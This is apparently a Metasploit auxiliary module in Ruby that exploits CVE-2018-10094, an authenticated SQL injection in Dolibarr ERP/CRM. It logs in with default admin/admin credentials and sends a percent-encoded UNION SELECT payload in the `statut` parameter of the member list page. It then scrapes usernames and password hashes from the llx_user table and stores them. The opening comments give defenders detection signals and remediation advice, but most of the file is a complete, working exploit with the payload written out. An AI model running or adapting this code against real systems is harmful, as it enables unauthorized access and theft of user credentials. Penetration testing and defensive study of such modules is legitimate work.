Path: blob/master/modules/auxiliary/gather/dolibarr_creds_sqli.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2018-10094: an authenticated SQL injection in the
# Dolibarr ERP/CRM member list that returns rows from the user table.
#
# Flow, as implemented below: fetch the index page, log in with the configured
# USERNAME/PASSWORD, send one GET to the member list with the injected
# `statut` value, then scrape login / pass_crypted pairs out of the HTML.
#
# Notes for defenders reading this file:
# * The request needs a valid session, so account hygiene matters. The option
#   defaults here are admin/admin; an instance that still accepts them is
#   exposed to any caller.
# * The injected `statut` value is sent with every byte percent-encoded
#   ('hex-all'). A fully percent-encoded `statut` on /adherents/list.php is
#   unusual for ordinary browsing and is a reasonable access-log / WAF signal.
# * The values read are what the description calls "encrypted" passwords.
#   If this query has run against an instance, treat those values as
#   disclosed: apply the vendor fix for the referenced CVE and rotate the
#   affected passwords.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the three user-settable options.
  #
  # @param info [Hash] metadata passed in by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Dolibarr Gather Credentials via SQL Injection',
        'Description' => %q{
          This module enables an authenticated user to collect the usernames and
          encrypted passwords of other users in the Dolibarr ERP/CRM via SQL
          injection.
        },
        'Author' => [
          'Issam Rabhi', # PoC
          'Kevin Locati', # PoC
          'Shelby Pace', # Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2018-10094' ],
          [ 'EDB', '44805']
        ],
        'DisclosureDate' => '2018-05-30'
      )
    )

    module_options = [
      OptString.new('TARGETURI', [ true, 'The base path to Dolibarr', '/' ]),
      OptString.new('USERNAME', [ true, 'The username for authenticating to Dolibarr', 'admin' ]),
      OptString.new('PASSWORD', [ true, 'The password for authenticating to Dolibarr', 'admin' ])
    ]
    register_options(module_options)
  end

  # Builds the path of the Dolibarr index page under TARGETURI, appending
  # '/index.php' only when TARGETURI does not already end with it.
  #
  # @return [String] normalized URI path
  def dolibarr_index_uri
    configured_path = target_uri.path
    return normalize_uri(configured_path) if configured_path.end_with?('index.php')

    normalize_uri(configured_path, '/index.php')
  end

  # Requests the index page and confirms the body mentions 'Dolibarr'.
  #
  # @return [Object, false] the HTTP response when the marker is present,
  #   otherwise false (also false when no response came back)
  def check_availability
    page = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(dolibarr_index_uri)
    )

    if page && page.body.include?('Dolibarr')
      page
    else
      false
    end
  end

  # Logs in with the configured USERNAME/PASSWORD, reusing the cookies that
  # came with the index page response.
  #
  # Success is judged by the presence of the members menu element in the
  # reply, so an account that logs in but is not shown that menu is reported
  # as a failed login.
  #
  # @param response [Object] response returned by #check_availability
  # @return [String, false] the cookie string to reuse, or false when no
  #   response was supplied; aborts through fail_with on a failed login
  def login(response)
    return false unless response

    post_target = dolibarr_index_uri
    session_cookies = response.get_cookies
    print_status("Logging in...")

    form_fields = {
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD'],
      'loginfunction' => 'loginfunction'
    }
    reply = send_request_cgi(
      'method' => 'POST',
      'uri' => post_target,
      'cookie' => session_cookies,
      'vars_post' => form_fields
    )

    logged_in = reply && reply.body.include?('id="mainmenua_members"')
    fail_with(Failure::NoAccess, "Couldn't log into Dolibarr") unless logged_in

    print_good("Successfully logged into Dolibarr")
    session_cookies
  end

  # Sends the single injected GET request to the member list and hands the
  # returned HTML to #format_results.
  #
  # The query text is percent-encoded in full ('hex-all') before it is
  # appended as the value of the `statut` parameter.
  #
  # @param cookies [String] session cookies from #login
  # @return [Object] whatever #format_results returns; aborts through
  #   fail_with when the list page marker is missing
  def get_info(cookies)
    base_path = target_uri.path
    # Drop 'index.php' so the list page is addressed relative to the app root.
    base_path = base_path.gsub('index.php', '') if base_path.end_with?('index.php')

    union_query = "1) union select 0,1,login,pass_crypted,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from llx_user #"
    encoded_query = Rex::Text.uri_encode(union_query, 'hex-all')
    inject_uri = "#{base_path}/adherents/list.php?leftmenu=members&statut=#{encoded_query}"

    list_page = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(inject_uri),
      'cookie' => cookies
    )

    reached_list = list_page && list_page.body.include?('id="searchFormList"')
    unless reached_list
      fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")
    end

    print_good("Accessed credentials")
    format_results(list_page.body)
  end

  # Scrapes credential pairs out of the list page HTML and records them.
  #
  # The pattern takes two adjacent table cells per matching row: the first
  # capture is restricted to ASCII letters and digits, the second is any run
  # of non-whitespace. The code stores the second capture as the user and the
  # first as the private value.
  #
  # @param output [String] HTML body of the member list response
  # @return [Array<Array<String>>] the scanned pairs; aborts through
  #   fail_with when nothing matches
  def format_results(output)
    row_pattern = /valignmiddle">0<\/div><\/a><\/td>.<td>([a-zA-Z0-9]*)<\/td>.<td>(\S*)<\/td>/m
    credentials = output.scan(row_pattern)

    if credentials.empty?
      fail_with(Failure::NotFound, "No credentials found")
    end

    credentials.each do |private_value, user_name|
      print_good("#{user_name} #{private_value}")
      store_valid_credential(user: user_name, private: private_value)
    end
  end

  # Entry point: availability check, login, then the gather request. Each
  # stage aborts the run through fail_with when the previous one produced
  # nothing usable.
  def run
    index_response = check_availability
    unless index_response
      fail_with(Failure::NotFound, "Could not access the Dolibarr webpage")
    end

    session_cookies = login(index_response)
    unless session_cookies
      fail_with(Failure::NoAccess, "Could not log in. Verify credentials")
    end

    get_info(session_cookies)
  end
end